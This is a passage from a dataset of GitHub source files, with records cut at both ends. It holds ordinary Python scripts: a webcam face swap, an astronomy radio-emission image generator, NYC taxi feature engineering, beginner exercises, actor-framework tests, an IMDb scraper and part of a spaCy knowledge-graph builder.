[]\n tri2Cropped = []\n\n for i in range(0, 3):\n tri1Cropped.append(((tri1[0][i][0] - r1[0]),(tri1[0][i][1] - r1[1])))\n tri2Cropped.append(((tri2[0][i][0] - r2[0]),(tri2[0][i][1] - r2[1])))\n\n # Given a pair of triangles, find the affine transform.\n warpMat = cv2.getAffineTransform( np.float32(tri1Cropped), np.float32(tri2Cropped) )\n\n # Apply the Affine Transform just found to the src image\n img2Cropped = cv2.warpAffine( img1Cropped, warpMat, (r2[2], r2[3]), None, flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REFLECT_101 )\n\n # Get mask by filling triangle\n mask = np.zeros((r2[3], r2[2], 3), dtype = np.float32)\n cv2.fillConvexPoly(mask, np.int32(tri2Cropped), (1.0, 1.0, 1.0), 16, 0)\n\n img2Cropped = img2Cropped * mask\n\n # Copy triangular region of the rectangular patch to the output image\n img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] = img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] * ( (1.0, 1.0, 1.0) - mask )\n\n img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] = img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] + img2Cropped\n\ndef landmarks_to_points(landmarks):\n points = []\n for i in range(len(landmarks.parts())):\n points.append((int(landmarks.part(i).x),int(landmarks.part(i).y)))\n\n return points\n\nsrc_image = cv2.imread(\"../data/images/Devansh01.jpg\")\n\nsrc_image = cv2.resize(src_image,(640,480),interpolation= cv2.INTER_LINEAR)\n\nface_detector = dlib.get_frontal_face_detector()\nlandmark_detector_path = \"../data/models/shape_predictor_68_face_landmarks.dat\"\n\nlandmark_detector = dlib.shape_predictor(landmark_detector_path)\n\nsrc_image_rgb = cv2.cvtColor(src_image,cv2.COLOR_BGR2RGB)\nface_rects_src = face_detector(src_image_rgb,0)\n\nnew_rect_src = dlib.rectangle(int(face_rects_src[0].left()),\n int(face_rects_src[0].top()),\n int(face_rects_src[0].right()),\n int(face_rects_src[0].bottom()))\n\nlandmarks_src = landmark_detector(src_image_rgb,new_rect_src)\n\npoints_src = landmarks_to_points(landmarks_src)\n\nindexes_src = cv2.convexHull(np.array(points_src),returnPoints = False)\nadd_points_src = [[48],[49],[50],[51],[52],[53],[54],[55],[56],[57],[58]]\ncombined_indexes_src = np.vstack([np.array(indexes_src),np.array(add_points_src)])\nhull1 = []\nfor i in range(len(combined_indexes_src)):\n hull1.append(points_src[combined_indexes_src[i,0]])\n\nrect = (0,0,src_image.shape[1],src_image.shape[0])\nsubdiv = cv2.Subdiv2D(rect)\n\nfor p in hull1:\n subdiv.insert(p)\n\nindexes_src_hull1 = []\ntriangle_list = subdiv.getTriangleList()\nfor tri in triangle_list:\n pt1 = (tri[0],tri[1])\n pt2 = (tri[2],tri[3])\n pt3 = (tri[4],tri[5])\n\n pt1_index = np.argmin(np.sqrt(((np.float32(hull1) - np.float32(pt1))**2).sum(axis = 1)),axis = 0)\n pt2_index = np.argmin(np.sqrt(((np.float32(hull1) - np.float32(pt2))**2).sum(axis = 1)),axis = 0)\n pt3_index = np.argmin(np.sqrt(((np.float32(hull1) - np.float32(pt3))**2).sum(axis = 1)),axis = 0)\n\n indexes_src_hull1.append((pt1_index,pt2_index,pt3_index))\n\ncap = cv2.VideoCapture(0)\nfirst_frame = True\nwhile cap.isOpened():\n\n ret ,dst_image = cap.read()\n\n if not ret:\n break\n\n dst_image_rgb = cv2.cvtColor(dst_image,cv2.COLOR_BGR2RGB)\n face_rects_dst = face_detector(dst_image_rgb,0)\n\n if len(face_rects_dst) == 0:\n continue\n new_rect_dst = dlib.rectangle(int(face_rects_dst[0].left()),\n int(face_rects_dst[0].top()),\n int(face_rects_dst[0].right()),\n int(face_rects_dst[0].bottom()))\n\n landmarks_dst = landmark_detector(dst_image_rgb,new_rect_dst)\n\n points_dst = landmarks_to_points(landmarks_dst)\n\n hull2 = []\n for i in range(len(combined_indexes_src)):\n hull2.append(points_dst[combined_indexes_src[i,0]])\n\n if first_frame:\n prev_frame_gray = cv2.cvtColor(dst_image_rgb,cv2.COLOR_BGR2GRAY)\n prev_hull = hull2\n first_frame = False\n \n frame_gray = cv2.cvtColor(dst_image_rgb,cv2.COLOR_RGB2GRAY)\n lk_params = dict( winSize = (101,101),maxLevel = 15,criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 20, 0.001))\n hull2Next, st , err = cv2.calcOpticalFlowPyrLK(prev_frame_gray,frame_gray,np.array(prev_hull,np.float32), np.array(hull2,np.float32),**lk_params)\n\n if (len(hull1) > len(hull2)) or len(hull2)!=len(hull2Next):\n continue\n\n\n for k in range(0,len(hull2)):\n d = cv2.norm(np.array(hull2[k]) - hull2Next[k])\n alpha = math.exp(-d*d/400)\n hull2[k] = (1 - alpha) * np.array(hull2[k]) + alpha * hull2Next[k]\n\n \n dst_image_copy1 = dst_image.copy()\n for idxs in indexes_src_hull1:\n tri_in = []\n tri_out = []\n for idx in idxs:\n tri_in.append(hull1[idx])\n tri_out.append(hull2[idx])\n tri_in = np.float32(tri_in).reshape(1,3,2)\n tri_out = np.float32(tri_out).reshape(1,3,2)\n warpTriangle(src_image,dst_image_copy1, tri_in, tri_out)\n\n output = correctColours(src_image, dst_image_copy1, points_dst)\n\n # Create a Mask around the face\n re = cv2.boundingRect(np.array(hull2,np.float32))\n centerx = (re[0]+(re[0]+re[2]))/2\n centery = (re[1]+(re[1]+re[3]))/2\n\n hull3 = []\n for i in range(0,len(hull2)-len(add_points_src)):\n # Take the points just inside of the convex hull\n hull3.append((0.95*(hull2[i][0] - centerx) + centerx, 0.95*(hull2[i][1] - centery) + centery))\n\n mask1 = np.zeros((dst_image.shape[0], dst_image.shape[1],3), dtype=np.float32)\n hull3Arr = np.array(hull3,np.int32)\n\n cv2.fillConvexPoly(mask1,hull3Arr,(255.0,255.0,255.0),16,0)\n\n # Blur the mask before blending\n mask1 = cv2.GaussianBlur(mask1,(51,51),10)\n\n mask2 = (255.0,255.0,255.0) - mask1\n\n # cv2.imshow(\"mask1\", np.uint8(mask1))\n # cv2.imshow(\"mask2\", np.uint8(mask2))\n\n # Perform alpha blending of the two images\n temp1 = np.multiply(output,(mask1*(1.0/255)))\n temp2 = np.multiply(dst_image,(mask2*(1.0/255)))\n result = temp1 + temp2\n\n cv2.imshow(\"temp1\", np.uint8(temp1))\n cv2.imshow(\"temp2\", np.uint8(temp2))\n\n result = np.uint8(result)\n\n prev_frame_gray = frame_gray.copy()\n prev_hull = hull2\n\n cv2.imshow(\"After Blending\", result)\n if cv2.waitKey(1) == ord('q'):\n break\n\n\ncap.release()\ncv2.destroyAllWindows()\n\n\n \n\n \n\n \n\n\n\n\n\n\n","repo_name":"jashdalvi/Advanced-Computer-Vision","sub_path":"ScriptFiles/face_swap_video.py","file_name":"face_swap_video.py","file_ext":"py","file_size_in_byte":7316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"17339184899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Make image of Galactic *free-free* radiation at given frequency.\n#\n# The re-combination line of H (especially Halpha line) traces the\n# Galactic free-free radiation (Smoot 1998; Reynold & Haffner 2000).\n# Finkbeiner (2003) provided the brightness map of Halpha (I_Halpha),\n# and the Galactic free-free radiation at 30 GHz can be calculated as:\n# T^{Gff}_{30GHz}(r) = 7.4e-6 * ( I_Halpha(r) / Rayleigh ) (K)\n# where: 1 Rayleigh = 1e6 / (4*pi) photons/s/cm^2/sr\n#\n# The spectrum of Galactic free-free radiation can be generally described\n# by a broken-powerlaw model, with a spectral index \\alpha = 2.10 when\n# frequency \\nu <= 10 GHz (Shaver et al. 1999), and index \\alpha = 2.15\n# when \\nu > 10 GHz (Bennett et al. 2003).\n# T^{Gff}_{\\nu}(r) \\proto \\nu^{- \\alpha}\n# => T^{Gff}_{\\nu}(r) = T^{Gff}_{30GHz} * (\\nu / 30GHz)^{- \\alpha}\n#\n# XXX:\n# * unit of input Halpha image: Rayleigh? or K?\n#\n# Aaron LI \n# 2015/03/26\n#\n# ChangeLogs:\n# 2015/03/30, Aaron LI\n# * Add header keywords \"FREQ\" & \"COMP\"\n# 2015/03/28, Aaron LI\n# * update author name\n# * replace for loops with numpy array manipulation in the output image\n# calculation, which greatly improve the calculate speed.\n#\n\nfrom astropy.io import fits\nimport numpy as np\n\nimport os\nimport sys\nimport getopt\nimport datetime\n\n\n# Spectral indexes of Galactic free-free radiation:\nindex_10ghz_above = 2.15 # If frequency is above 10 GHz\nindex_10ghz_below = 2.10 # If frequency is below 10 GHz\n\n\nUSAGE = \"\"\"Usage:\n %(prog)s [ -h -C -v ] -f freq_MHz -i Halpha_img -o outfile\n\nRequired arguments:\n -f, --freq\n frequency (MHz) at which the radiation image to be made\n -i, --infile\n H_alpha image which used as the calculation template\n -o, --outfile\n output FITS file of the radiation image at given frequency\n\nOptional arguments:\n -h, --help\n print this usage\n -C, --clobber\n overwrite output file if already exists\n -v, --verbose\n show verbose information\n\"\"\" % { 'prog': os.path.basename(sys.argv[0]) }\n\n\ndef mkfits_galff(freq, infile, verbose=False):\n \"\"\"\n Return FITS of Galactic free-free image at given frequency,\n with header copyed from the input file.\n \"\"\"\n if verbose:\n print(\"Openning %s ...\" % infile)\n halpha_fits = fits.open(infile)\n # convert data type to \"float64\"\n halpha_data = halpha_fits[0].data.astype(np.float64)\n # calculate outfile data\n if verbose:\n print(\"Calculating output image data ...\")\n T_gff_30ghz = 7.4e-6 * halpha_data # unit: K\n if freq >= 10000:\n # freq >= 10 GHz: one single power law is sufficient\n out_data = T_gff_30ghz * np.power(freq/30000, -index_10ghz_above)\n else:\n # freq < 10 GHz: requires broken power law\n T_gff_10ghz = T_gff_30ghz * np.power(10000/30000, -index_10ghz_above)\n out_data = T_gff_10ghz * np.power(freq/10000, -index_10ghz_below)\n # Copy the header of infile to outfile\n out_header = halpha_fits[0].header.copy(strip=True)\n # Remove some unwanted keywords from header\n for key in [\"CONTENT\", \"HDUNAME\"]:\n if key in out_header:\n del out_header[key]\n # Add meta information of the new fits to header\n out_header.set(\"FREQ\", freq, \"MHz\")\n out_header.set(\"COMP\", \"Galactic_free-free\", \"Radiation component\")\n # close fits file\n halpha_fits.close()\n # create the FITS object including the image data and header\n out_fits = fits.PrimaryHDU(data=out_data, header=out_header)\n return out_fits\n\n\ndef mkcards_hist(cmd_list):\n \"\"\"\n Return a list of HISTORY Card, which record the tool and parameters\n used in this process.\n \"\"\"\n tool_card = fits.Card(\"HISTORY\",\n \"TOOL: %(tool)s (%(time)s)\" % {\n 'tool': cmd_list[0],\n 'time': datetime.datetime.today().strftime(\"%Y-%m-%dT%H:%M:%S\") },\n \"by Weitian LI (c) 2015\")\n parm = \"PARM: \" + \" \".join(cmd_list[1:])\n parm_card = fits.Card(\"HISTORY\", parm)\n return [tool_card, parm_card]\n\n\ndef usage():\n print(USAGE)\n\n\ndef main():\n \"\"\"\n Process command line arguments, and calculate output image,\n update header history, and write to file.\n \"\"\"\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"Cf:hi:o:v\",\n [\"clobber\", \"freq=\", \"help\", \"infile=\",\n \"outfile=\", \"verbose\"])\n except getopt.GetoptError as err:\n print(err)\n usage()\n sys.exit(2)\n verbose = False\n clobber = False\n # Records this tool and its options/arguments,\n # and used to write history into FITS header.\n cmd_list = [ os.path.basename(sys.argv[0]) ]\n for opt, arg in opts:\n if opt in (\"-v\", \"--verbose\"):\n verbose = True\n cmd_list.append(\"--verbose\")\n elif opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt in (\"-C\", \"--clobber\"):\n clobber = True\n cmd_list.append(\"--clobber\")\n elif opt in (\"-f\", \"--freq\"):\n freq = float(arg)\n assert (freq > 0), \"Specified frequency = %f <= 0!\" % freq\n cmd_list.append(\"--freq=%s\" % freq)\n elif opt in (\"-i\", \"--infile\"):\n infile = arg\n cmd_list.append(\"--infile=%s\" % infile)\n elif opt in (\"-o\", \"--outfile\"):\n outfile = arg\n cmd_list.append(\"--outfile=%s\" % outfile)\n else:\n assert False, \"unhandled option\"\n\n if verbose:\n print(\"freq = %s MHz\" % freq)\n print(\"infile = %s\" % infile)\n print(\"outfile = %s\" % outfile)\n print(\"clobber = %s\" % clobber)\n\n # Create the FITS object for the radiation image\n out_fits = mkfits_galff(freq=freq, infile=infile, verbose=verbose)\n\n # Update fits header to record this tool and parameters.\n hist_cards = mkcards_hist(cmd_list)\n out_fits.header.extend(hist_cards)\n\n # Write FITS object into output file.\n if verbose:\n print(\"Writing data to %s ...\" % outfile)\n out_fits.writeto(outfile, clobber=clobber, checksum=True)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"liweitianux/radio-fg-simu-tools","sub_path":"scripts/mkimg_galff_freq.py","file_name":"mkimg_galff_freq.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"27467314506","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns \nimport sklearn\nimport sys, os\nfrom sklearn import preprocessing\n\n#import pandas_profiling as pandas_profiling\nplt.style.use('seaborn-whitegrid')\n\n\ndef readInTaxi():\n \"\"\"\n read in and clean dataset \n return: df_train, df_test [pd.DataFrame]\n \"\"\"\n df = pd.read_csv('../NYC_taxi/train_small.csv', nrows=50000, \n parse_dates=[\"pickup_datetime\"])\n \n \n print('read in dataset -- training: ', df.shape)\n \n ## ==== step 1: missing values==================================\n df.dropna(how='any', axis='rows', inplace=True)\n\n \n \n ## === step 2: negative fareamount, constrained coordinates\n mask = (df['fare_amount'] > 0)\n df = df[mask]\n \n boxes = {'longitude': (-75, -73), 'latitude': (40, 42)}\n mask = (df['pickup_longitude'] >= boxes['longitude'][0]) & \\\n (df['pickup_longitude'] <= boxes['longitude'][1]) & \\\n (df['dropoff_longitude'] >= boxes['longitude'][0]) & \\\n (df['dropoff_longitude'] <= boxes['longitude'][1]) & \\\n (df['pickup_latitude'] >= boxes['latitude'][0]) & \\\n (df['pickup_latitude'] <= boxes['latitude'][1]) & \\\n (df['dropoff_latitude'] >= boxes['latitude'][0]) & \\\n (df['dropoff_latitude'] <= boxes['latitude'][1])\n\n df = df[mask]\n print('*'*77)\n print('after drop dummies -- training: ', df.shape)\n\n return df\n\n\ndef distance(row):\n lat1 = row['dropoff_latitude']\n lat2 = row['pickup_latitude']\n lon1 = row['dropoff_longitude']\n lon2 = row['pickup_longitude']\n \n ## haversine formula https://en.wikipedia.org/wiki/Haversine_formula\n R = 6371\n dLat = np.pi/180 * (lat2 - lat1)\n dLon = np.pi/180 * (lon2 - lon1)\n a = np.sin(dLat/2)**2 + np.cos(np.pi/180*lat1) * np.cos(np.pi/180*lat2) * \\\n + np.sin(dLon/2)**2\n c = 2 * np.arctan(np.sqrt(a)/np.sqrt(1-a))\n return R * c\n\ndef distance_to_poi(row, poi):\n lat1 = row['pickup_latitude']\n lon1 = row['pickup_longitude']\n lon2 = poi[0]\n lat2 = poi[1]\n R = 6371\n dLat = np.pi/180 * (lat2 - lat1)\n dLon = np.pi/180 * (lon2 - lon1)\n a = np.sin(dLat/2)**2 + np.cos(np.pi/180*lat1) * np.cos(np.pi/180*lat2) * \\\n + np.sin(dLon/2)**2\n c = 2 * np.arctan(np.sqrt(a)/np.sqrt(1-a))\n return R * c\n\ndef feature_engineer(df):\n ## ==== step 1: calculate the point distance from pickup to dropoff=============\n df['distance'] = df.apply(distance, axis=1)\n \n ## ==== step 2: calculate the point distance to landmarks=============\n poi = {'nyc': (-74.006389, 40.714167),\n 'jfk': (-73.782223, 40.644167),\n 'ewr': (-74.175, 40.689722),\n 'lga': (-73.87194, 40.774722)}\n \n \n for i in poi.keys():\n df['dist_to_{}'.format(i)] = df.apply(lambda x: distance_to_poi(x, poi[i]), axis=1)\n\n ## ==== step 3: clean the timestamp\n df['hour'] = df['pickup_datetime'].dt.hour\n df['day_of_week'] = df['pickup_datetime'].dt.dayofweek\n df['month'] = df['pickup_datetime'].dt.month\n df['year'] = df['pickup_datetime'].dt.year\n \n features = ['fare_amount', 'pickup_longitude',\n 'pickup_latitude', 'dropoff_longitude', 'dropoff_latitude',\n 'passenger_count', 'hour', 'day_of_week', 'month', 'year', 'distance',\n 'dist_to_nyc', 'dist_to_jfk', 'dist_to_ewr', 'dist_to_lga']\n \n print('*'*77)\n print('after feature engineered -- training: ', df.shape)\n \n return df[features]\n","repo_name":"Yingru/NYC_taxi","sub_path":"src/readInData.py","file_name":"readInData.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71161486920","text":"def f(s):\n return 'a' in s\n\ndef satisfiesF(L):\n \"\"\"\n Assumes L is a list of strings\n Assume function f is already defined for you and it maps a string to a Boolean\n Mutates L such that it contains all of the strings, s, originally in L such\n that f(s) returns True, and no other elements. Remaining elements in L\n should be in the same order.\n Returns the length of L after mutation\n \"\"\"\n newList = [] #this will contain all the True elements\n for i in range(len(L)):\n if f(L[i]): #so go through each item, if it is true\n newList.append(L[i]) #add it to the new list\n L[:] = newList #convert L to the new LIst\n return len(L) #return the length of it\nrun_satisfiesF(L, satisfiesF)\n","repo_name":"reysu/Python-Practice","sub_path":"Quiz/satisfies.py","file_name":"satisfies.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28273515569","text":"##과제2: 격자가 그려지는 프로그램. 0,0 부터 500,500까지 크기 100짜리 격자가 그려지도록\n#for이나 while등의 반복문 사용\n#크기가 100이라는건 선이 5등분 났다는 소리, 그렇다는 건 가로 세로 선을 여섯개 그어야?\n#화면 크기문제로 사이즈를 0,0부터 300,300까지 크기 60 격자가 그려지는 것으로 바꾸었습니다,\n#죄송합니다ㅠㅠㅠㅠㅠㅠㅠ\n\nimport turtle #일단 터틀모듈 임포\n\nturtle.speed(0) #속도 빠르게\nstart_x = 0 #시작점 좌표\nstart_y = 0\n\ndef turtle_move(a,b): #거북이 이동시킬 함수\n turtle.penup()\n turtle.goto(a,b)\n turtle.pendown()\n\nfor i in range(6): #세로줄부터 먼저 긋기로, 즉슨 가로방향으로 이동(x축방향)\n turtle.goto(start_x,start_y-300)\n start_x = start_x + 60 \n turtle_move(start_x, start_y)\n\nstart_x = 0 #시작점 좌표값 클리어\nstart_y = 0\nturtle_move(0,0)\n\nfor i in range(6): #마지막으로 가로줄!\n turtle.goto(start_x+300,start_y)\n start_y = start_y - 60 \n turtle_move(start_x, start_y)\n\n\n\nturtle.exitonclick()\n \n","repo_name":"duck9827/Term","sub_path":"수업내용/py_01_03_2017184017_2.py","file_name":"py_01_03_2017184017_2.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8167021881","text":"user_input = input(\"Enter your integers separated by spaces: \")\n\n# Splitting the input string into a list of elements\nuser_list = user_input.split()\n# his uses the default behavior of split() without specifying any delimiter.\n# In this case, it treats consecutive\n# whitespace (including spaces, tabs, and newlines) as the delimiter and splits the string accordingly.\n\n# Converting elements to integers\nuser_list = [int(element) for element in user_list]\nlength = len(user_list)\nmul = 1\nfor i in range(0,length):\n mul = mul * user_list[i]\n\nprint(\"The result of multiplying all the elements are : \"+str(mul))\n\n","repo_name":"Rimo2/Python_Promod_Sir_Class","sub_path":"27_OCT_2023/ListMultiply.py","file_name":"ListMultiply.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11335228558","text":"array = {'platano', 'melon', 'sandia'}\n\narray.add(\"kiwi\")\narray.remove(\"melon\")\n\n\nfor fruta in array:\n print(\"Las frutas son: \" + fruta) \n\narray.clear()\nprint(\"Ahora ya no hay frutas\")\n\n#MÁS EJEMPLOS\n\n#1\ndiccionario = {\n \"Programar\": \"Programar es transformar el cafe en codigo\",\n \"POO\": \"Programación orientada a objetos\",\n \"MVC\": \"Modelo Vista Controlador\"\n}\n\nprint(diccionario[\"POO\"])\n\n#2\nnumeros = {\n \"0\": \"Cero\",\n \"1\": \"Uno\",\n \"2\": \"Dos\"\n}\n\ntexto = input(\"Ingrese un numero: \")\n\ntextoFinal = \"\"\nfor letra in texto:\n textoFinal += numeros[letra]\n\nprint(textoFinal) ","repo_name":"JoelGarciaValhondo/Python","sub_path":"7-Array.py","file_name":"7-Array.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28379324185","text":"import pytest\n\nfrom protoactor.actor.event_stream import EventStream\nfrom protoactor.mailbox.dispatcher import Dispatchers\n\n@pytest.mark.asyncio\nasync def test_can_subscribe_to_specific_event_types():\n received_events = []\n\n async def fun(msg):\n received_events.append(msg)\n\n event_stream = EventStream()\n event_stream.subscribe(fun, str)\n await event_stream.publish('hello')\n\n assert received_events[0] == 'hello'\n\n@pytest.mark.asyncio\nasync def test_can_subscribe_to_all_event_types():\n received_events = []\n\n async def fun(msg):\n received_events.append(msg)\n\n event_stream = EventStream()\n event_stream.subscribe(fun)\n\n await event_stream.publish('hello')\n assert received_events[0] == 'hello'\n\n await event_stream.publish(1)\n assert received_events[1] == 1\n\n await event_stream.publish(True)\n assert received_events[2] is True\n\n@pytest.mark.asyncio\nasync def test_can_unsubscribe_from_events():\n received_events = []\n\n async def fun(msg):\n received_events.append(msg)\n\n event_stream = EventStream()\n subscription = event_stream.subscribe(fun, str)\n await event_stream.publish('first message')\n subscription.unsubscribe()\n await event_stream.publish('second message')\n\n assert len(received_events) == 1\n\n@pytest.mark.asyncio\nasync def test_only_receive_subscribed_to_event_types():\n received_events = []\n\n async def fun(msg):\n received_events.append(msg)\n\n event_stream = EventStream()\n event_stream.subscribe(fun, int)\n await event_stream.publish('not an int')\n\n assert len(received_events) == 0\n\n@pytest.mark.asyncio\nasync def test_can_subscribe_to_specific_event_types_async():\n\n async def fun(msg):\n received = msg\n assert received == 'hello'\n\n event_stream = EventStream()\n event_stream.subscribe(fun, str, Dispatchers().default_dispatcher)\n await event_stream.publish('hello')","repo_name":"asynkron/protoactor-python","sub_path":"tests/actor/test_event_stream.py","file_name":"test_event_stream.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"63"} +{"seq_id":"31865550578","text":"import logging\nimport random\nimport subprocess\nimport time\n\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport requests\n\n# install dependencies\nsubprocess.check_call(['pip', 'install', 'beautifulsoup4'])\nsubprocess.check_call(['pip', 'install', 'pandas'])\nsubprocess.check_call(['pip', 'install', 'requests'])\n\n# log format\nlogging.basicConfig(\n format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S',\n level=logging.INFO)\n\n\ndef get_request_headers() -> dict:\n return {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/50.0.2661.102 Safari/537.36'}\n\n\ndef convert_runtime(time_str):\n if len(time_str) == 2:\n return f\"{60}\"\n if \"h\" not in time_str.lower():\n return time_str[: len(time_str) - 1]\n hours, minutes = time_str.split(\"h \")\n minutes = int(minutes[:-1])\n total_minutes = int(hours) * 60 + minutes\n return total_minutes\n\n\ndef run():\n logging.info('Script Start running ...')\n df = pd.read_csv('new.csv')\n ids = df['0']\n data = []\n for ind, each_id in enumerate(ids):\n try:\n url = f\"https://m.imdb.com/title/{each_id}/\"\n page = requests.post(url, headers=get_request_headers())\n if page.status_code == 200:\n soup = BeautifulSoup(page.content, \"html.parser\")\n title = soup.find('span', class_=\"sc-afe43def-1 fDTGTb\").text\n ul = soup.find('ul',\n class_='ipc-inline-list ipc-inline-list--show-dividers sc-afe43def-4 kdXikI baseAlt')\n lis = ul.findAll('li', class_=\"ipc-inline-list__item\")\n\n print(lis)\n\n if len(lis) == 4:\n data.append(\n [title.strip(), lis[0].text.strip(), convert_runtime(lis[3].text.strip()), lis[1].text.strip().replace('–', '-'),\n each_id])\n\n elif len(lis) == 2:\n if 'tv' in lis[0].text.strip().lower():\n data.append(\n [title.strip(), lis[0].text.strip(), convert_runtime(lis[1].text.strip()), 'N/A', each_id])\n else:\n data.append([title.strip(), 'N/A', convert_runtime(lis[1].text.strip()), lis[0].text.strip().replace('–', '-'), each_id])\n\n logging.info(f'--> data is extracted for id = {each_id}')\n\n except Exception as ex:\n print(ex)\n logging.error(f'--> failed to extract data from id = {each_id}')\n continue\n\n df = pd.DataFrame(data, columns=[\"Title\", \"MediaType\", \"RunTime\", \"Year\", \"ImdbID\"])\n df.to_csv(f\"data-{random.randint(1, 9999)}.csv\", index=False, encoding='utf8')\n logging.info('Script successfully completed!')\n\n\nrun()\n","repo_name":"saifarnab/web_scraping","sub_path":"imdb/imdb.py","file_name":"imdb.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"10033513350","text":"#!/usr/bin/python3\n\n'''\nAuthor: Ambareesh Ravi\nDate: 26 July, 2021\nFile: text_knowledge_graph.py\nDescription:\n Creates and visualizes a knowledge from textual data using Natural Language Processing.\n Has applications in medicine, finance, recommendation systems, fraud detection, trading etc.\n'''\n\n# Library imports\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nimport spacy\nfrom spacy.matcher import Matcher\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nfrom tqdm import tqdm\n\n# Module imports\nfrom data import *\n\n# Global variables\n# Change to different language pack as required\nnlp = spacy.load('en_core_web_sm')\n\nclass TextKnowledgeGraph:\n # Creates and visualizes a knowledge graph from textual data\n def __init__(self, data):\n '''\n Initializes the class\n\n Args:\n data - the text data as \n Returns:\n -\n Exception:\n -\n '''\n self.data = data\n\n # define pattern matching params\n self.matcher = Matcher(nlp.vocab)\n pattern = [\n {'DEP':'ROOT'},\n {'DEP':'prep','OP':\"?\"},\n {'DEP':'agent','OP':\"?\"},\n {'POS':'ADJ','OP':\"?\"}\n ]\n self.matcher.add(\"matching_1\", None, pattern)\n\n # Build the knowledge graph\n self.build()\n\n def extract_entities(self, sentence):\n '''\n Extracts entities from a sentence using Spacy dependency parser\n\n Args:\n sentence - the input sentence as \n Returns:\n pair of entities as \n Exception:\n -\n '''\n\n entity1, entity2, prefix, modifier, prev_token_dep, prev_token_text = \"\", \"\", \"\", \"\", \"\", \"\"\n \n for token in nlp(sentence):\n # Skip punctuation\n if token.dep_ == \"punct\": continue\n \n # Check for compound sentence/ words\n if token.dep_ == \"compound\":\n prefix = token.text\n # Check for and add the previous compound words\n if prev_token_dep == \"compound\":\n prefix = \"%s %s\"%(prev_token_text, token.text)\n \n # Check if token is a modifier\n if token.dep_.endswith(\"mod\") == True:\n modifier = token.text\n # Check for and add the previous compound words\n if prev_token_dep == \"compound\":\n modifier = \"%s %s\"%(prev_token_text, token.text)\n \n # Check if the word/ token is the subject\n if token.dep_.find(\"subj\") == True:\n entity1 = \"%s %s %s\"%(modifier, prefix, token.text)\n prefix, modifier, prev_token_dep, prev_token_text = \"\", \"\", \"\", \"\"\n \n # Check if the word/ token is the object\n if token.dep_.find(\"obj\") == True:\n entity2 = \"%s %s %s\"%(modifier, prefix, token.text)\n \n # Update values\n prev_token_dep, prev_token_text = token.dep_, token.text\n \n # Return results\n return [entity1.strip(), entity2.strip()]\n\n\n def extract_relations(self, sentence):\n '''\n Extracts the relationships in the sentence\n\n Args:\n sentence - the input sentence as \n Returns:\n relationship as \n Exception:\n -\n '''\n\n doc = nlp(sentence)\n matches = self.matcher(doc)\n span = doc[matches[-1][1]:matches[-1][2]]\n return span.text\n\n def get_knowledge_graph_data(self, entity_pairs, relations):\n '''\n Creates and returns as dataframe for knowledge graph creation\n\n Args:\n entity_pairs - of all entity pairs in the dataset\n relations - of all relationships between the entity pairs in the dataset\n Returns:\n data as \n Exception:\n -\n '''\n\n ep_array = np.array(entity_pairs)\n # subject [source] -> object [target]\n kd_df = pd.DataFrame(\n {\n \"source\": ep_array[:,0],\n \"target\": ep_array[:,1],\n \"edge\": relations\n }\n )\n return kd_df\n\n def create_network(self, kd_df, key_relation = None):\n '''\n Creates directed graph from knowledge graph dataframe\n\n Args:\n kd_df - knowledge graph data as \n key_relation - a particular relationship to look for \n Returns:\n graph as \n Exception:\n -\n '''\n \n dir_graph = nx.from_pandas_edgelist(\n df = kd_df[kd_df['edge'] == key_relation] if key_relation else kd_df,\n source = 'source',\n target = 'target',\n edge_attr = True,\n create_using = nx.MultiDiGraph()\n )\n return dir_graph\n\n def plot_graph(self, dir_graph, figsize = (12,12), node_spacing = 0.5, node_size = 1000, node_color = 'skyblue'):\n '''\n Plots and displays the knowledge graph using matplotlib.pyplot\n\n Args:\n dir_graph - knowledge graph as \n figsize - size of the figure as a \n node_spacing - parameter to adjust the distance between nodes in the graph as \n node_size - maximum number of nodes as \n node_color - colour for the nodes as [correspondingly color map has to be changed]\n Returns:\n -\n Exception:\n -\n '''\n \n plt.figure(figsize = figsize)\n pos = nx.spring_layout(dir_graph, k = node_spacing)\n nx.draw(dir_graph, with_labels = True, node_color = node_color, node_size = node_size, edge_cmap = plt.cm.Blues, pos = pos)\n plt.show() \n\n def build(self,):\n '''\n Builds the knowledge graph internally and stores it in a 